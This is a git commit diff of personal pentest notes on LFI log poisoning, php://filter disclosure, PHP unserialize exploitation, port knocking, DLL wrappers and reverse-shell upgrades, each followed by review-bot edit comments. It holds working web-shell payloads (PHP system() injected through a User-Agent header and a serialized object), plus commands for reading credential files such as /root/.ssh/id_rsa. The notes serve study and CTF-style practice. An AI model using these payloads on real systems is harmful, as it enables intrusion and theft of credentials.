notes on reversing
This commit is contained in:
parent
469aeb2618
commit
375271ef5d
|
@ -0,0 +1,13 @@
|
|||
# Port Knocking
|
||||
|
||||
* Open filtered port behind a firewall by knocking nicely
|
||||
|
||||
## Usage
|
||||
|
||||
* `knockd`
|
||||
```sh
|
||||
knock <target-IP> <magicWords>
|
||||
```
|
||||
or
|
||||
* [arch wiki nmap script](https://wiki.archlinux.org/title/Port_knocking)
|
||||
* `nc -z`
|
|
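Review bot: the bullet is labelled `knockd` (the server daemon) while the command shown is the `knock` client, and `<magicWords>` hides what the argument actually is: the port sequence the daemon was configured with, e.g. `knock <target-IP> 7000 8000 9000`. Label the bullet `knock` (client, shipped with knockd), say that the sequence and protocol must match the daemon's configured sequence, and give the `nc -z` bullet the same one-line usage treatment, since on its own it does not say what to pass. Worth one line on the defensive side too: the knock sequence travels in cleartext and is replayable, so it hides a port but does not authenticate anyone.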
@ -26,10 +26,17 @@ http://example.com/home?page=/etc/passwd
|
|||
```sh
|
||||
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: <TARGETIP>' -H 'User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1'
|
||||
```
|
||||
* Follow up with a request to
|
||||
```HTTP
|
||||
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
|
||||
```
|
||||
|
||||
* Follow up with a request to
|
||||
|
||||
```HTTP
|
||||
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
|
||||
```
|
||||
|
||||
### /proc/self/fd
|
||||
* [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2)
|
||||
* Log poisoning and opening logfile via `/proc/self/fd/xx`.
|
||||
|
||||
### Base64 Encoding via PHP
|
||||
* Circumvent filter via encoding local files included ins a GET parameter value
|
||||
```http
|
||||
|
@ -48,9 +55,11 @@ curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<
|
|||
* `/root/.ssh/id_rsa`
|
||||
* `/var/log/apache2/access.log`
|
||||
* `C:\boot.ini`
|
||||
* `/proc/self/fd/xx`
|
||||
|
||||
## Tricks
|
||||
|
||||
* Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4
|
||||
* Terminate query with `/.`
|
||||
* `..//..//..//file`, double slashes
|
||||
|
||||
|
|
|
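Review bot: the `* Follow up with a request to` bullet and its `curl ... &lfi=ls%20../` block appear twice verbatim (the second copy under an `HTTP` fence); drop the duplicate, and tag the remaining block `sh` like the log-poisoning request above it, since the body is a curl command rather than an HTTP message. Two wording fixes in the same hunk: "included ins a GET parameter value" should read "in a GET parameter value", and "does the trick until PHP 5.3.4" reads better as "works up to PHP 5.3.4, which added null-byte checks on filesystem paths". The `### Base64 Encoding via PHP` heading opens an `http` fence that only closes in the unchanged context; that is fine, but the `php://filter/convert.base64-encode/resource=` line it introduces deserves a one-line explanation of why it matters (the included source comes back base64-encoded as text instead of being executed, which is also why reviewers check for `php://` in include paths).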
@ -0,0 +1,20 @@
|
|||
# Unserialize
|
||||
|
||||
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize/)
|
||||
|
||||
* Serialize via
|
||||
```php
|
||||
<?php
|
||||
class FormSubmit {
|
||||
public $form_file = 'messages.php';
|
||||
public $message = '<?php
|
||||
if(isset($_GET[\'cmd\']))
|
||||
{
|
||||
system($_GET[\'cmd\']);
|
||||
}
|
||||
?>';
|
||||
}
|
||||
|
||||
print urlencode(serialize(new FormSubmit));
|
||||
?>
|
||||
```
|
|
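Review bot: the snippet only generates the payload; it does not record which magic method on the target consumes `$form_file` and `$message` (the linked notsosecure post relies on a `__destruct` that writes `$message` into the file named by `$form_file`), so add that line or the note is not reproducible later. Also worth a one-liner on the fix side next to the link: never pass attacker-controlled data to `unserialize()`; use JSON for data interchange, or at minimum `unserialize($data, ['allowed_classes' => false])` (PHP 7+) so no object with side-effecting magic methods is instantiated.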
@ -0,0 +1,9 @@
|
|||
# DLL Reversing
|
||||
|
||||
* Start DLL on its own with the help a wrapper
|
||||
```C#
|
||||
HMODULE dll = LoadLibraryA("DLL.DLL");
|
||||
typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y)
|
||||
Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName");
|
||||
Add(1, 2);
|
||||
```
|
|
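Review bot: the fence is tagged `C#` but the body is Win32 C/C++ (`typedef`, `WINAPI`, `LoadLibraryA`/`GetProcAddress`); tag it `c` or `cpp` so the snippet is not read as C#. The wrapper also needs `#include <windows.h>` and NULL checks on both `dll` and `Add`: `GetProcAddress` returns NULL when the name does not match the export table exactly, which is the usual outcome with a decorated name typed by hand, so list the exports first (e.g. `dumpbin /exports DLL.DLL`) and paste the name from there. The `WINAPI` (`__stdcall`) and `void` return in the typedef are guesses until checked against the export or the disassembly; a wrong calling convention or return type corrupts the stack silently on x86. Typo in the bullet: "with the help a wrapper" should read "with the help of a wrapper".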
@ -0,0 +1,4 @@
|
|||
# Function Decoration
|
||||
|
||||
* Done to imported functions in order to do interpositioning and identify the variants of the function.
|
||||
* [name mangling](https://en.wikipedia.org/wiki/Name_mangling)
|
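Review bot: the first bullet is vague on what decoration is: "identify the variants of the function" means that the decorated (MSVC) or mangled (Itanium ABI, GCC/Clang) symbol name encodes calling convention, enclosing namespace or class, and parameter types, so overloads get distinct exported names; interpositioning is one thing that relies on those names, not the reason they exist. Rephrasing it that way also ties this note to the `Add_MangledName` lookup in the DLL note, which is where the decorated name has to be reproduced exactly.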
Binary file not shown.
|
@ -1,5 +1,9 @@
|
|||
# Upgrade Reverse Shell
|
||||
|
||||
* [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
|
||||
* [reverse shell without python](https://www.schtech.co.uk/linux-reverse-shell-without-python/)
|
||||
* [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)
|
||||
|
||||
## Via interpreter
|
||||
### PHP
|
||||
* reverse shell
|
||||
|
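Review bot: the new `### PHP` subsection adds only the bullet `* reverse shell` with no command under it, unlike the python and perl entries in the existing context; either add the one-liner from the linked HighOn.Coffee cheat sheet or leave the heading out until it has content. The three links at the top would also be more useful with a word each on what they cover (ropnop is the `stty`/`script` tty upgrade procedure, schtech is the no-python case, HighOn.Coffee the per-interpreter one-liners).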
@ -24,6 +28,11 @@ python -c 'import pty; pty.spawn("/bin/bash")'
|
|||
perl -e 'exec "/bin/sh";'
|
||||
```
|
||||
|
||||
### Script
|
||||
```sh
|
||||
/usr/bin/script -qc /bin/bash /dev/null
|
||||
```
|
||||
|
||||
## Next
|
||||
1. `ctrl` + `z`
|
||||
2. `stty echo -raw`
|
||||
|
|
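Review bot: step 2 under `## Next` has the stty flags the wrong way round for an upgrade: `stty echo -raw` restores cooked mode with echo, which is what you run on the local terminal afterwards to clean up; the upgrade step from the linked ropnop post is `stty raw -echo` on the local terminal, and the list is missing the `fg` that brings the shell back and the `reset` / `export TERM=xterm` that follow. Spell the order out: `ctrl` + `z`, `stty raw -echo`, `fg`, then `reset` and set `TERM`, with `stty echo -raw` (or `stty sane`) noted as the cleanup once the session ends. The `script -qc /bin/bash /dev/null` line is fine; a comment that `-q` is quiet and `/dev/null` is the typescript destination would save looking it up.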